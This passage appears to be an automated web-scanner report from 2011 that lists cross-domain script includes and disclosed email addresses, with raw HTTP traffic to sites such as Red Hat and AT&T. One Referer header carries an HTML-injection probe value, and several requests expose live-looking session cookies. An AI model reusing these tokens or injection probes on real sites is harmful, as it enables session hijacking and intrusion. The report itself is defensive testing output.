P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 79391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/20
...[SNIP]...
<!-- start m/s/a/_g_a_s , head -->
<script src="http://i.media-imdb.com/images/SF8d0b995d92e3ad5a396df0cf37d04ab0/js/cc/ads.js" ></script>
...[SNIP]...
<!-- h=iop513 i=2011-08-12 s=legacy(default) t='Mon Aug 15 11:23:53 2011' wl=33.2 -->
<script src="http://i.media-imdb.com/images/SF10092eee563dec2dca82b77d2cf5a1ae/js/jquery.js" ></script><script src="http://i.media-imdb.com/images/SF18c96e463aac059cff552cd248df0eca/js/cc/gateway.js" ></script>
...[SNIP]...
</div>
<script src="http://i.media-imdb.com/images/SF1b83364c8a1d6f71c79acfee1edd87be/js/clicktale-WRb6.js" type="text/javascript"></script>
<script type="text/javascript" src="http://i.media-imdb.com/images/SF8ce2dec22e880d42dd87258c611fc340/js/clicktale-FetchFromWithCookies.js"></script>
...[SNIP]...
</script><script src="http://i.media-imdb.com/images/SF86793c35a08946b1496c39d0dbd5b6c9/js/jquery/plugins/jquery.colorbox-min.js" ></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SFd9ecfaa62b429289ac143d0519845252/js/cc/loginbox.js" ></script><script src="http://i.media-imdb.com/images/SF1bc55d526cb484e2b1ad3ef681e954cf/js/cc/suggestionsearch.js" charset="UTF-8"></script><script src="http://i.media-imdb.com/images/SF7729f70b3427ebc52f697b34f8977e34/a/js/timer.js" ></script><script src="http://i.media-imdb.com/images/SF72e1d93fddec7a7150ae9de2b334a1cd/js/jquery/plugins/jquery.appear-1.1.1.min.js" ></script><script src="http://i.media-imdb.com/images/SF1dabb5dab89baaf127350c0edb1c87c0/js/app/clickstream/rvi.js" ></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SF14176f459bd0474f6a0284a9c3ba61f7/a/js/beacon.js" ></script>
...[SNIP]...

14.40. http://www.ipraction.cn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ipraction.cn
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ipraction.cn
Proxy-Connection: keep-alive
Referer: http://news.sohu.com/s2011/dajijiamao/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:26:24 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3739
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:24:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link href="/library/column/2011/07/04/C30830/style/base.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://www.cctv.com/Library/homepage2008/20081114/script/top_111701.js"></script>
<script type="text/javascript" src="http://www.cctv.com/Library/a2.js"></script>
...[SNIP]...

14.41. http://www.mediafire.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.js"></script>
...[SNIP]...

14.42. https://www.redhat.com/wapps/store/cart.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redhat.com
Path:   /wapps/store/cart.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wapps/store/cart.html HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.StoreClient/23C3DC20B12A64E2BDA08CE4D8FD2819.cache.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ZMw58E0hOGt6QhgfU0v9Og**.9247cfa6; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435243515%3Ad1344971243515%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435265712; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/apps/store/desktop/%2526oid%253Dhttps%25253A//www.redhat.com/apps/store/desktop/%252523nolink%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 20042
Expires: Mon, 15 Aug 2011 19:06:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:06:51 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat.co
...[SNIP]...
<td width="135" align="center" valign="top"><script src=https://seal.verisign.com/getseal?host_name=www.redhat.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

14.43. http://www.tudou.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:55:46 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:53:30 GMT
Content-Length: 247630
Expires: Mon, 15 Aug 2011 19:02:36 GMT
Cache-Control: max-age=420
Vary: Accept-Encoding
Age: 10
X-Cache: HIT from www.tudou.com

<!DOCTYPE html>
<html>
<head>
<meta charset="gbk"/>

<title>......_...................._............,............,............</title>
<meta name="Keywords" content="......,....,....,........,...
...[SNIP]...
</div>
<script src="http://js.tudouui.com/js/lib/tuilib_83.js"></script>
...[SNIP]...

14.44. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135031
Expires: Mon, 15 Aug 2011 18:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:04 GMT
Connection: close
Set-Cookie: TLTHID=31FEFBDCC76B10C7BCD0FCE33BDE3340; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...
</script>

<script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...

14.45. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/netbook-packages.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cell-phone-service/packages/netbook-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.4.10.1313431966; TLTHID=9C4648E2C76B10C7B846FFAD8CC90BB7; TLTSID=9C4648E2C76B10C7B846FFAD8CC90BB7; BIGipServerpWL_7010_7011=2060571015.25115.0000; fsr.a=1313432642829; wtAka=y

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 91395
Expires: Mon, 15 Aug 2011 18:23:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:23:08 GMT
Connection: close
Set-Cookie: TLTHID=A01F50D0C76B10C7BEB5A17F0D25FB73; Path=/; Domain=.att.com


                                                                           
...[SNIP]...
</script>

<script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...

14.46. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103697
Expires: Mon, 15 Aug 2011 18:20:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:32 GMT
Connection: close
Set-Cookie: TLTHID=43172EBCC76B10C7CFD7C47F0B9E96D6; Path=/; Domain=.att.com


                                                                       
...[SNIP]...
</script>

<script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...

14.47. http://www.xhamstercams.com/cam/Juicy_Jules19/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cam/Juicy_Jules19/?gl=1&AFNO=1-0-624213-344279&UHNSMTY=458&lp=3 HTTP/1.1
Host: www.xhamstercams.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NaiadJP=cj1odHRwJTNBJTJGJTJGeGhhbXN0ZXIuY29tJTJGJmU9aHR0cCUzQSUyRiUyRnd3dy54aGFtc3RlcmNhbXMuY29tJTJGZXhwb3J0cyUyRmdvbGl2ZSUyRiUzRkFGTk8lM0QxLTAtNjI0MjEzLTM0NDI3OSUyNlVITlNNVFklM0Q0NTglMjZERiUzRDAlMjZscCUzRDMmbz0xMzEzNDM0NTg2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:48 GMT
Server: Apache
Set-Cookie: fcact=fcA6_2502%2F2Z; expires=Mon, 22-Aug-2011 18:56:48 GMT; path=/
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Vary: Accept-Encoding
Content-Length: 32305
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free live video chat, free nude cam, sex shows, adult streaming, free porn - XHamsterCam
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://m1.nsimg.net/static/x/google/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://m2.nsimg.net/cache/js/bundle/naiad/20110806/naiad.js"></script>
...[SNIP]...

14.48. http://www.zedo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zedo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Last-Modified: Thu, 21 Jul 2011 15:08:18 GMT
ETag: "164834d-5412-4a895b8087c80"
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 21522
Cache-Control: max-age=418651
Expires: Sat, 20 Aug 2011 15:13:06 GMT
Date: Mon, 15 Aug 2011 18:55:35 GMT
Connection: close

<html>
<head>
<meta name="google-site-verification" content="jAe5iatPlve0j-h6pe6lOCIzQFRTD_MG4U9o4NEyVFI" />
<TITLE>ZEDO Advertising Technology Partner</TITLE>
<META NAME="DESCRIPTION" CONTENT="ZE
...[SNIP]...
<!-- myseofriend.com -->
<script type="text/javascript" src="http://myseofriend.net/myseofriend.js"></script>
...[SNIP]...

14.49. http://www.zedo.com/shared/commonHeader.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zedo.com
Path:   /shared/commonHeader.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shared/commonHeader.htm?pg= HTTP/1.1
Host: www.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 11 Jul 2011 09:01:30 GMT
ETag: "163612f-79d3-4a7c76dd74e80"
Vary: Accept-Encoding
Server: ZEDO 3G
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 31187
Cache-Control: max-age=1869098
Expires: Tue, 06 Sep 2011 10:07:14 GMT
Date: Mon, 15 Aug 2011 18:55:36 GMT
Connection: close

<link rel="stylesheet" href="http://www.zedo.com/shared/brochure.css" type="text/css">
<link rel="stylesheet" href="http://www.zedo.com/shared/tabs.css" type="text/css">
<SCRIPT LANGUAGE="JavaScript"
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

15. Email addresses disclosed  previous  next
There are 21 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


15.1. http://graphics.friendfinder.com/images/js/AjaxRequest-compact.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://graphics.friendfinder.com
Path:   /images/js/AjaxRequest-compact.js

Issue detail

The following email address was disclosed in the response:

Request

GET /images/js/AjaxRequest-compact.js HTTP/1.1
Host: graphics.friendfinder.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 18 Jul 2006 22:17:50 GMT
ETag: "13b757f-299b-418e284691f80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 10651
Content-Type: application/x-javascript
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Cache-Control: max-age=358413
Expires: Fri, 19 Aug 2011 22:31:17 GMT
Date: Mon, 15 Aug 2011 18:57:44 GMT
Connection: close

// ===================================================================
// Author: Matt Kruse <matt@ajaxtoolbox.com>
// WWW: http://www.AjaxToolbox.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...

15.2. http://hire.jobvite.com/CompanyJobs/careers_8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/careers_8.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /CompanyJobs/careers_8.js?v=128 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: http-cookie-8hr=R3814240431

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: private,max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Aug 2011 00:52:28 GMT
Accept-Ranges: bytes
ETag: "02e331dd353cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:07 GMT
Content-Length: 84419

.../*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infr
...[SNIP]...
</div>');
       _contactImportError = null;
   }
   var i = '';
